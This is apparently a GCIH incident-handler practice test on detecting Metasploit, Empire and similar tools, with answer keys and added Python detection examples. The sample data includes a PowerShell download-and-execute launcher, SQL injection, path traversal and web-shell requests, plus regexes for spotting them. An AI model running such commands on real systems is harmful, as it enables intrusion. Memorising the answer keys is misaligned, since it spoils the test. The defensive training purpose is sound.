Free GCIH Detecting Exploitation Tools Practice Test 2026 — GIAC Incident Handler Questions
This free GCIH Detecting Exploitation Tools practice test covers detecting exploitation tools — identifying Metasploit, Cobalt Strike, Empire, Sliver, and other offensive frameworks via artifacts, signatures, and TLS fingerprints. Each question includes a detailed explanation — perfect for GIAC Certified Incident Handler / SANS SEC504 exam prep.
Key Topics in GCIH Detecting Exploitation Tools
- Metasploit Indicators
- Cobalt Strike Artifacts
- Empire / PowerShell Empire
- Sliver C2
- Exploit Kit Signatures
- JA3 / JA3S Fingerprinting
6 Free GCIH Detecting Exploitation Tools Practice Questions with Answers
Sample Question 1 — Detecting Exploitation Tools
During an incident response investigation, you suspect that an attacker has used the Metasploit Framework to exploit a known vulnerability on a server. Which Metasploit command would you use to search for available exploits related to a specific CVE identifier?
- A. search cve:2021-1234 (Correct answer)
- B. exploit -c CVE-2021-1234
- C. find CVE-2021-1234
- D. lookup CVE-2021-1234
Correct answer: A
Explanation: Metasploit's 'search' command accepts keyword filters, and 'search cve:2021-1234' lists the modules whose references include CVE-2021-1234; it can be narrowed further with other keywords such as 'type:exploit'. This lets an incident handler quickly see which public exploit modules exist for the vulnerability the attacker is suspected of using. The other options are not valid msfconsole commands: 'exploit' runs the currently selected module rather than searching, and 'find' and 'lookup' do not exist in the console.
Sample Question 2 — Detecting Exploitation Tools
You are investigating a Windows server compromise and suspect that a payload was delivered using the Metasploit Framework. Upon analyzing the network traffic, you notice a significant number of outbound connections from the server to an unfamiliar IP address. Which Metasploit payload is known for creating a reverse TCP connection from a Windows victim to the attacker's machine?
- A. windows/meterpreter/reverse_tcp (Correct answer)
- B. linux/x86/shell_reverse_tcp
- C. windows/shell_bind_tcp
- D. java/meterpreter/bind_tcp
Correct answer: A
Explanation: The 'windows/meterpreter/reverse_tcp' payload makes the victim open a TCP connection back to the attacker's handler, which then delivers the Meterpreter stage and controls the host over that session. That is why a server that suddenly initiates outbound sessions to an unfamiliar address is the indicator described in the question. Option B is also a reverse TCP payload, but it is built for Linux hosts and so does not fit a Windows server. Options C and D are bind TCP payloads: they open a listening port on the victim and wait for the attacker to connect in, which shows up as inbound connections to an unusual port rather than outbound ones.
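The two network indicators discussed above, as an added example that is not part of the original page or of the Metasploit project: a server that repeatedly initiates TCP sessions to an address outside the internal ranges, and the length-prefixed stage download that a staged Metasploit reverse_tcp handler sends. The connection records, the internal address ranges, the server list and the stage bytes are all constructed for the example.

```python
import ipaddress
import struct
from collections import Counter

# Constructed Zeek conn.log-style records for a DMZ web server (10.1.2.15):
# (src_ip, dst_ip, dst_port, proto, resp_bytes). Sample data, not a real capture.
CONN_RECORDS = [
    ("10.1.2.15", "10.1.2.20", 1433, "tcp", 5120),          # database, expected
    ("203.0.113.7", "10.1.2.15", 443, "tcp", 0),            # inbound client, normal
    ("10.1.2.15", "198.51.100.23", 4444, "tcp", 175132),    # server -> internet, stage pull
    ("10.1.2.15", "198.51.100.23", 4444, "tcp", 640),
    ("10.1.2.15", "198.51.100.23", 4444, "tcp", 512),
    ("10.1.2.15", "198.51.100.23", 4444, "tcp", 480),
    ("10.1.2.15", "198.51.100.23", 4444, "tcp", 704),
    ("10.1.2.15", "10.1.2.20", 1433, "tcp", 4096),
]

# Assumptions for this example: the organisation's internal ranges, and the
# hosts that should never initiate sessions to the internet on their own.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SERVERS = {"10.1.2.15"}

# Constructed first server->client burst of a staged handler. The Metasploit
# reverse_tcp handler writes the stage length as a 32-bit little-endian integer
# followed by the stage itself; 175128 filler bytes stand in for the stage here.
STAGE_LEN = 175128
SAMPLE_STAGE_BURST = struct.pack("<I", STAGE_LEN) + b"\x90" * STAGE_LEN


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def outbound_from_servers(records, min_count: int = 3) -> dict:
    """Map (server, external_ip, port) -> session count for servers that repeatedly
    initiate TCP sessions to non-internal addresses, the reverse-connection pattern."""
    counts = Counter()
    for src, dst, dport, proto, _resp_bytes in records:
        if proto == "tcp" and src in SERVERS and not is_internal(dst):
            counts[(src, dst, dport)] += 1
    return {key: n for key, n in counts.items() if n >= min_count}


def looks_like_msf_stage(server_to_client: bytes, min_stage: int = 20_000) -> bool:
    """Heuristic for a staged Metasploit reverse_tcp exchange: the first bytes from
    the handler are a 4-byte little-endian length equal to the size of the stage
    that follows. Assumes the caller passes the complete first server->client burst.
    Stageless payloads (e.g. windows/meterpreter_reverse_tcp) carry no such prefix."""
    if len(server_to_client) < 4:
        return False
    declared = struct.unpack("<I", server_to_client[:4])[0]
    return declared >= min_stage and declared == len(server_to_client) - 4


if __name__ == "__main__":
    for (src, dst, port), n in outbound_from_servers(CONN_RECORDS).items():
        print(f"{src} initiated {n} sessions to {dst}:{port} (outside internal ranges)")
    print("stage-length prefix present:", looks_like_msf_stage(SAMPLE_STAGE_BURST))
```

The length-prefix check is only a heuristic: it needs the full first burst from the handler, and a bind payload or a stageless payload will not show it. The outbound-session count is the more general signal, since any reverse payload, Metasploit or otherwise, has to make the victim call out.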
Sample Question 3 — Detecting Exploitation Tools
During an incident response, you suspect that an attacker is using a known exploitation tool to scan your network. What is the first tool you should use to confirm this activity?
- A. Wireshark (Correct answer)
- B. Nmap
- C. Exiftool
- D. Metasploit
Correct answer: A
Explanation: Wireshark is a network protocol analyzer that captures packets and lets you browse them interactively. Looking at the packets is the best first step to confirm suspected scanning, because a scan has a recognisable shape on the wire: one source sends connection attempts to many ports or hosts in a short time, and most of those attempts are answered with resets or not at all. Nmap is itself a scanning tool, Exiftool extracts file metadata, and Metasploit is an exploitation framework; none of them confirms that someone else is scanning your network.
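The scan pattern described in the explanation above, as an added example that is not part of the original page: the logic a Wireshark display filter such as 'tcp.flags.syn == 1 && tcp.flags.ack == 0' isolates, applied to packet summaries of the kind tshark prints. The packet list, the addresses and the thresholds are constructed for the example.

```python
from collections import defaultdict

# Wireshark display filter that isolates the same packets the function below
# counts: SYNs that are not part of a reply, i.e. connection attempts only.
WIRESHARK_FILTER = "tcp.flags.syn == 1 && tcp.flags.ack == 0"

# Constructed packet summaries: (ts, src, sport, dst, dport, flags), where
# "S" = SYN, "SA" = SYN/ACK, "A" = ACK, "RA" = RST/ACK. Sample data, not a capture.
SCANNER, TARGET, CLIENT = "198.51.100.9", "10.1.2.15", "203.0.113.7"
PACKETS = [
    (0.000, CLIENT, 51234, TARGET, 443, "S"),   # ordinary client handshake
    (0.001, TARGET, 443, CLIENT, 51234, "SA"),
    (0.002, CLIENT, 51234, TARGET, 443, "A"),
]
for i, port in enumerate(range(21, 41)):        # 20 ports probed within one second
    t = 1.0 + i * 0.05
    PACKETS.append((t, SCANNER, 40000, TARGET, port, "S"))
    # closed ports answer RST/ACK; ports 22 and 25 are "open" here and answer SYN/ACK
    PACKETS.append((t + 0.0005, TARGET, port, SCANNER, 40000, "SA" if port in (22, 25) else "RA"))


def _max_distinct_ports(events, window: float) -> int:
    """Largest number of distinct destination ports seen inside any `window`-second
    span, using a sliding window over the sorted (ts, port) events of one pair."""
    events = sorted(events)
    live = defaultdict(int)
    best = left = 0
    for ts, port in events:
        live[port] += 1
        while ts - events[left][0] > window:
            old = events[left][1]
            live[old] -= 1
            if live[old] == 0:
                del live[old]
            left += 1
        best = max(best, len(live))
    return best


def syn_scan_sources(packets, min_ports: int = 10, window: float = 2.0) -> dict:
    """Flag (src, dst) pairs whose SYN-only packets touch >= min_ports distinct
    ports within `window` seconds, and count the RST/ACK (closed) and SYN/ACK
    (open) replies the target sent back. Returns
    {(src, dst): {"ports": n, "closed": c, "open": o}}."""
    attempts = defaultdict(list)
    replies = defaultdict(lambda: {"closed": 0, "open": 0})
    for ts, src, _sport, dst, dport, flags in packets:
        if flags == "S":
            attempts[(src, dst)].append((ts, dport))
        elif flags in ("RA", "SA"):
            # a reply from dst back to src belongs to the (src, dst) attempt pair
            replies[(dst, src)]["closed" if flags == "RA" else "open"] += 1
    findings = {}
    for pair, events in attempts.items():
        n = _max_distinct_ports(events, window)
        if n >= min_ports:
            findings[pair] = {"ports": n, **replies[pair]}
    return findings


if __name__ == "__main__":
    for (src, dst), info in syn_scan_sources(PACKETS).items():
        print(f"{src} -> {dst}: {info['ports']} ports in window, "
              f"{info['closed']} closed, {info['open']} open (Wireshark: {WIRESHARK_FILTER})")
```

A high ratio of RST/ACK replies to SYN probes is what separates a port scan from a busy but legitimate client: real clients connect to ports they know are open.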
Sample Question 4 — Detecting Exploitation Tools
An incident handler receives an alert about potential exploitation activity on a critical server. What is the most effective initial action to take to confirm the exploitation?
- A. Run a full vulnerability scan on the server.
- B. Check the server's event logs for unusual activity. (Correct answer)
- C. Disconnect the server from the network immediately.
- D. Initiate a full forensic analysis on the server.
Correct answer: B
Explanation: Checking the server's event logs (process creation, service installation, logon and PowerShell events, for example) is the most effective initial action: it gives immediate insight into what ran on the host without disrupting it. A full vulnerability scan or a complete forensic analysis takes time and may prove unnecessary once the alert is understood. Disconnecting the server should be considered only once the threat is confirmed and poses an immediate risk.
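The log review described above, as an added example that is not part of the original page: triage of Windows Security event ID 4688 (process creation, with command-line auditing enabled) for the launcher traits that PowerShell Empire and similar frameworks commonly use, including decoding the -EncodedCommand argument so the handler can read what was actually run. The events, the download URL and the list of suspicious parent processes are constructed for the example.

```python
import base64
import re


def _encode_ps(cmd: str) -> str:
    """Build a -EncodedCommand value the way PowerShell expects it: UTF-16LE, base64."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed Windows Security log events, reduced to the fields used here.
# Sample data, not real logs; the URL is a documentation address.
LAUNCHER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a')"
EVENTS = [
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\svchost.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + _encode_ps(LAUNCHER)},
    {"EventID": 4624, "NewProcessName": "", "ParentProcessName": "", "CommandLine": ""},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

# -EncodedCommand and the abbreviations PowerShell accepts for it.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|IEX|Invoke-Expression", re.I)
# Assumption: parents that should never spawn a shell or PowerShell on this server.
SUSPICIOUS_PARENTS = ("w3wp.exe", "winword.exe", "excel.exe", "sqlservr.exe")


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_process_events(events) -> list:
    """Return one finding per 4688 event that shows launcher traits: an encoded
    command, a download or eval cmdlet inside the decoded script, a hidden window,
    profile suppression, or an unexpected parent process."""
    findings = []
    for ev in events:
        if ev["EventID"] != 4688:
            continue
        cmd = ev["CommandLine"]
        reasons = []
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded command")
            if DOWNLOAD_RE.search(decoded):
                reasons.append("download/eval in decoded script")
        if HIDDEN_RE.search(cmd):
            reasons.append("hidden window")
        if re.search(r"-(?:nop|noprofile)\b", cmd, re.I):
            reasons.append("no profile")
        parent = ev["ParentProcessName"].rsplit("\\", 1)[-1].lower()
        if parent in SUSPICIOUS_PARENTS and re.search(r"powershell|cmd\.exe", cmd, re.I):
            reasons.append(f"spawned by {parent}")
        if reasons:
            findings.append({"process": ev["NewProcessName"], "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in triage_process_events(EVENTS):
        print(f["process"], "->", ", ".join(f["reasons"]))
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

The second 4688 event is the interesting one: PowerShell launched by the IIS worker process with a hidden window and an encoded download-and-execute script is the shape of a web-shell or exploit follow-on, while the scheduled backup script launched from Explorer carries none of these traits.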
Sample Question 5 — Detecting Exploitation Tools
You are tasked with identifying if a specific exploitation tool is being used within your network. Which of the following methods is the most practical first step in your investigation?
- A. Perform a deep packet inspection on all network traffic.
- B. Review recent IDS/IPS alerts for signatures of known exploitation tools. (Correct answer)
- C. Conduct a full audit of all installed software on network devices.
- D. Run a behavioral analysis on all endpoint activities.
Correct answer: B
Explanation: Reviewing recent IDS/IPS alerts for signatures of known exploitation tools is the most practical first step. It leverages existing security systems to quickly identify suspicious activity. Deep packet inspection and full software audits are more resource-intensive and time-consuming. Behavioral analysis, while useful, is not the most immediate action to take.
Sample Question 6 — Detecting Exploitation Tools
An alert indicates potential exploitation of a web application. As a first responder, what is your priority to confirm the exploitation attempt?
- A. Capture a memory dump of the web server.
- B. Review web server access logs for suspicious entries. (Correct answer)
- C. Immediately patch the web application.
- D. Run a penetration test on the web application.
Correct answer: B
Explanation: Reviewing the web server's access logs is the priority for confirming an exploitation attempt. Each entry records the source address, request line, status code and User-Agent, so the attacker's probes and any request that actually triggered the flaw are usually visible there, and reading the logs does not alter the server's state. Capturing a memory dump or patching should follow once the attempt is confirmed. Running a penetration test is not an incident response measure at all.
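The access-log review described above, as an added example that is not part of the original page: a parser for combined-format log lines that flags scanner User-Agents, path traversal (after decoding twice, so double-encoded separators are caught) and query parameters that look like command or SQL injection. The log lines, the scanner list and the parameter heuristics are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed combined-format access log lines. Sample data, not a real server log.
ACCESS_LOG = """\
203.0.113.7 - - [12/Mar/2026:10:14:02 +0000] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
198.51.100.9 - - [12/Mar/2026:10:15:11 +0000] "GET /login.php?user=admin%27%20OR%201%3D1-- HTTP/1.1" 200 812 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
198.51.100.9 - - [12/Mar/2026:10:15:12 +0000] "GET /cgi-bin/..%2f..%2f..%2fetc/passwd HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Nikto/2.1.6)"
198.51.100.9 - - [12/Mar/2026:10:15:40 +0000] "GET /images/..%252f..%252fweb.config HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2026:10:16:03 +0000] "POST /uploads/shell.php?cmd=id HTTP/1.1" 200 57 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2026:10:16:30 +0000] "GET /docs/?q=find%20the%20file HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Apache/Nginx combined log format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SCANNER_UA = re.compile(r"sqlmap|nikto|nmap|masscan|wpscan", re.I)
# Values that look like SQL tautologies or shell metacharacters; heuristic only.
INJECTION_RE = re.compile(r"('\s*or\s+\d+\s*=\s*\d+|;|\||`|\$\()", re.I)
SHELL_PARAMS = ("cmd", "exec", "command")


def parse_line(line: str):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def review_access_log(text: str) -> dict:
    """Return {source_ip: [(reason, raw_target, status), ...]} for requests that show
    a scanner User-Agent, path traversal, or an injection-looking parameter."""
    findings = defaultdict(list)
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        target = rec["target"]
        decoded = unquote(unquote(target))          # twice: %252f -> %2f -> /
        query = parse_qs(urlsplit(decoded).query, keep_blank_values=True)
        reasons = []
        if SCANNER_UA.search(rec["ua"]):
            reasons.append("scanner user-agent")
        if "../" in decoded or "..\\" in decoded:
            reasons.append("path traversal")
        for name, values in query.items():
            if name.lower() in SHELL_PARAMS or any(INJECTION_RE.search(v) for v in values):
                reasons.append(f"suspicious parameter {name}")
                break
        for reason in reasons:
            findings[rec["ip"]].append((reason, target, int(rec["status"])))
    return dict(findings)


if __name__ == "__main__":
    for ip, hits in review_access_log(ACCESS_LOG).items():
        print(ip)
        for reason, target, status in hits:
            print(f"  {status} {reason}: {target}")
```

Grouping by source address matters more than any single rule: one address that scans, probes for traversal and then gets a 200 on a POST to an unexpected script is the sequence an exploitation attempt leaves behind, and the status codes tell you which of its requests the server actually served.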
About the GCIH Exam
- Questions: 106 multiple choice
- Time: 4 hours
- Passing score: 70%
- Provider: GIAC (SANS Institute)
- Aligned with: SANS SEC504
- Total domains: 14